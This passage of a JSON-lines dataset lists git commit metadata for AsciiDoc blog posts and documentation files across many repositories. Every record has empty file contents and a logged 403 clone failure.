2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc50407fa457b461703644c6283cdd92af99662","subject":"Renamed '_posts\/2017-08-15-IDE-Faster-IDE.adoc' to '_posts\/2017-08-15-IDE.adoc'","message":"Renamed '_posts\/2017-08-15-IDE-Faster-IDE.adoc' to '_posts\/2017-08-15-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-15-IDE.adoc","new_file":"_posts\/2017-08-15-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82675b37d3d8712767e0791220a07a9d15db1f7f","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73340f45e6d389c68138cbe2c92f9b58f4b89489","subject":"Update 2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","message":"Update 2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","new_file":"_posts\/2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7e737cdd536116f640a4081715f4b0146e32270","subject":"add how to start cts as service doc","message":"add how to start cts as service doc\n","repos":"kylinsoong\/CustomizedTools,CustomizedTools\/CustomizedTools,kylinsoong\/CustomizedTools,kylinsoong\/CustomizedTools,CustomizedTools\/CustomizedTools,CustomizedTools\/CustomizedTools","old_file":"docs\/How_to_start_CustomizedTools_as_service.asciidoc","new_file":"docs\/How_to_start_CustomizedTools_as_service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kylinsoong\/CustomizedTools.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"53744e26981f6d9a61d839e37f9eab956af67265","subject":"Proposal on bridging to external endpoints (#3134)","message":"Proposal on bridging to external endpoints (#3134)\n\n* Proposal on bridging to external endpoints\r\n\r\nIssue #3150 ","repos":"jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/bridging_external.adoc","new_file":"documentation\/design\/proposals\/bridging_external.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81816d3fcacee9547d36e56fe11503348793629b","subject":"Deleted 20161110-1232-showoff-zone-owo.adoc","message":"Deleted 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0613b4c565391edc2629f0f9ef280127149135f","subject":"create post 4 Unique Gadgets You Didn't Know Existed...","message":"create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-4-Unique-Gadgets-You-Didnt-Know-Existed....adoc","new_file":"_posts\/2018-02-26-4-Unique-Gadgets-You-Didnt-Know-Existed....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"561d84008fd890875dfa85512c38c60f9907b008","subject":"Update 2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","message":"Update 2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","new_file":"_posts\/2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"253ff8a509af11ceced3ba02c6f11304e9d7d1e0","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f40664040311c690a1e3d8d4cfe71efd829f17c","subject":"y2b create post Is This The New Bluetooth Champion?","message":"y2b create post Is This The New Bluetooth Champion?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-13-Is-This-The-New-Bluetooth-Champion.adoc","new_file":"_posts\/2016-12-13-Is-This-The-New-Bluetooth-Champion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2259eda5830d3af73dcb2c84d573865d630d5061","subject":"y2b create post This Mysterious Box Is Over 100lbs... What Could It Be?","message":"y2b create post This Mysterious Box Is Over 100lbs... What Could It Be?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-10-This-Mysterious-Box-Is-Over-100lbs-What-Could-It-Be.adoc","new_file":"_posts\/2017-03-10-This-Mysterious-Box-Is-Over-100lbs-What-Could-It-Be.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a915bdd069bffcffcd608e2648988740baf57966","subject":"Update 2016-12-07-Telecharger-une-video-avec-son-url.adoc","message":"Update 2016-12-07-Telecharger-une-video-avec-son-url.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Telecharger-une-video-avec-son-url.adoc","new_file":"_posts\/2016-12-07-Telecharger-une-video-avec-son-url.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b87fecbf0b81c870612631ae1d03b7d0591708e5","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/joke_on_us.adoc","new_file":"content\/writings\/joke_on_us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e8d5c2f456bb44a87df0ea7bba007561c40ecd6f","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea44e5551c9f2e853503585f6009ef520f6395c6","subject":"Update 2017-09-29-Code-Display.adoc","message":"Update 2017-09-29-Code-Display.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-29-Code-Display.adoc","new_file":"_posts\/2017-09-29-Code-Display.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8fc1b0c1d78a237a756b0115421cbf1c62e30a9","subject":"Added Windows Google Drive client artifacts.","message":"Added Windows Google Drive client artifacts.\n","repos":"Onager\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70b944571effeddd3c0b7d26e3ed7515f0ff733d","subject":"Update 2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe6038ce997540c646fa051c9eca81a2e7089244","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76bd0cf55d980ab598cb0a2135c09fe7327d3153","subject":"quickly document mapview-generate-charts","message":"quickly document mapview-generate-charts\n\nSigned-off-by: Ricky Elrod <3de8762d49a778edd8b1aa9f381ea5a9ccb62944@elrod.me>\n","repos":"noexc\/mapview,noexc\/mapview","old_file":"doc\/mapview-generate-charts.adoc","new_file":"doc\/mapview-generate-charts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noexc\/mapview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71bb09a075853a4a84633b44a832cf5b290cc8eb","subject":"Update 2016-02-21-Django-Learning.adoc","message":"Update 2016-02-21-Django-Learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-02-21-Django-Learning.adoc","new_file":"_posts\/2016-02-21-Django-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b355471290dd47461154ba6cd90f0007ee67094","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"642efeca7a8b8d8849fd9ed75a14aef5d7e77ed2","subject":"Update 2017-03-17-073-Is-Released.adoc","message":"Update 2017-03-17-073-Is-Released.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2017-03-17-073-Is-Released.adoc","new_file":"_posts\/2017-03-17-073-Is-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b825c04bb61934f46f2b2fc9550a5ff1a7321f9","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7db3c32d6b48a284e276fbc8944fac3692a50890","subject":"y2b create post This Simple Trick Will Speed Up Any Android","message":"y2b create post This Simple Trick Will Speed Up Any Android","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-14-This-Simple-Trick-Will-Speed-Up-Any-Android.adoc","new_file":"_posts\/2016-08-14-This-Simple-Trick-Will-Speed-Up-Any-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c85aa44b13d2f1e9be2604ad00ebded093304fdb","subject":"Inform that scanner must be enabled for hot-deploy","message":"Inform that scanner must be enabled for hot-deploy","repos":"pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb8e2ec9fb13320a9a3b2060526d5f2b25c00102","subject":"Added readme for Level files.","message":"Added readme for Level files.\n","repos":"dom96\/BrokenBonez","old_file":"BrokenBonez\/app\/src\/main\/assets\/levels\/readme.asciidoc","new_file":"BrokenBonez\/app\/src\/main\/assets\/levels\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dom96\/BrokenBonez.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bc50dde3893ed2915e41e0395a1341ec5f5482e","subject":"add Ch4_AdvancedPromises\/promise-library.adoc","message":"add Ch4_AdvancedPromises\/promise-library.adoc\n","repos":"genie88\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liubin\/promises-book,wenber\/promises-book,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,cqricky\/promises-book,sunfurong\/promise,purepennons\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,sunfurong\/promise,tangjinzhou\/promises-book,cqricky\/promises-book,dieface\/promises-book,liubin\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,mzbac\/promises-book,oToUC\/promises-book,dieface\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_file":"Ch4_AdvancedPromises\/promise-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"596bcaf3c0ceb6d81041d3c2ce29daaeb5fd91cb","subject":"initial draft","message":"initial draft\n","repos":"OpenHFT\/Chronicle-Queue,OpenHFT\/Chronicle-Queue","old_file":"docs\/Queue-Replication-Message-Protocol-Overview.adoc","new_file":"docs\/Queue-Replication-Message-Protocol-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"523443c2017c5e3004478ac200cc780fa347c26e","subject":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","message":"Update 2016-12-09-re-Invent-and-that-going-abroad.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_file":"_posts\/2016-12-09-re-Invent-and-that-going-abroad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b64b4a4fd5a48372319e21f1b1d36646151b474f","subject":"y2b create post Unboxing The $5000 Massage Chair...","message":"y2b create post Unboxing The $5000 Massage Chair...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-15-Unboxing-The-5000-Massage-Chair.adoc","new_file":"_posts\/2017-09-15-Unboxing-The-5000-Massage-Chair.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e237578861358c8417e990a666d8d2af5613884d","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2155bed298085c0ec60d04d7de71141851dbe1f","subject":"Suppl style","message":"Suppl style\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d722f8804121924c4c4c6646a78fb817e4391924","subject":"0.10.0.Final release announcement","message":"0.10.0.Final release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-10-02-debezium-0-10-0-final-released.adoc","new_file":"blog\/2019-10-02-debezium-0-10-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"faa00497c5ff99f716bbf977e07938314d99bd3a","subject":"y2b create post Tablet Showdown: iPad 2 vs Galaxy Tab 10.1 vs HP TouchPad","message":"y2b create post Tablet Showdown: iPad 2 vs Galaxy Tab 10.1 vs HP TouchPad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-09-Tablet-Showdown-iPad-2-vs-Galaxy-Tab-101-vs-HP-TouchPad.adoc","new_file":"_posts\/2011-07-09-Tablet-Showdown-iPad-2-vs-Galaxy-Tab-101-vs-HP-TouchPad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66f998b6cc434375113bda586fbb32a2cd5f0724","subject":"y2b create post GoPro Hero3 HD Camera Unboxing (Black Edition)","message":"y2b create post GoPro Hero3 HD Camera Unboxing (Black Edition)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-05-GoPro-Hero3-HD-Camera-Unboxing-Black-Edition.adoc","new_file":"_posts\/2013-02-05-GoPro-Hero3-HD-Camera-Unboxing-Black-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d530f9fab8563b28777b2e5aba09057194ce6bd","subject":"Update 2016-08-04-Why-are-all-programming-languages-in-English.adoc","message":"Update 2016-08-04-Why-are-all-programming-languages-in-English.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-08-04-Why-are-all-programming-languages-in-English.adoc","new_file":"_posts\/2016-08-04-Why-are-all-programming-languages-in-English.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f11ca7bc6c9c35216a2024ee26166be83fa8c13","subject":"OGM-521 Update Neo4j javadoc","message":"OGM-521 Update Neo4j javadoc\n","repos":"uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,ZJaffee\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,hferentschik\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,schernolyas\/hibernate-ogm,tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/neo4j.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"fe3bcc00a02b69131387a9b3284a571d344401d4","subject":"Update 2016-12-01-A-W-S-re-Invent2016-firstday.adoc","message":"Update 2016-12-01-A-W-S-re-Invent2016-firstday.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-01-A-W-S-re-Invent2016-firstday.adoc","new_file":"_posts\/2016-12-01-A-W-S-re-Invent2016-firstday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7732eb4d46edec7df6667764867592e06c70a0c9","subject":"y2b create post The Most Ridiculous Purchase...","message":"y2b create post The Most Ridiculous Purchase...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-13-The-Most-Ridiculous-Purchase.adoc","new_file":"_posts\/2017-09-13-The-Most-Ridiculous-Purchase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 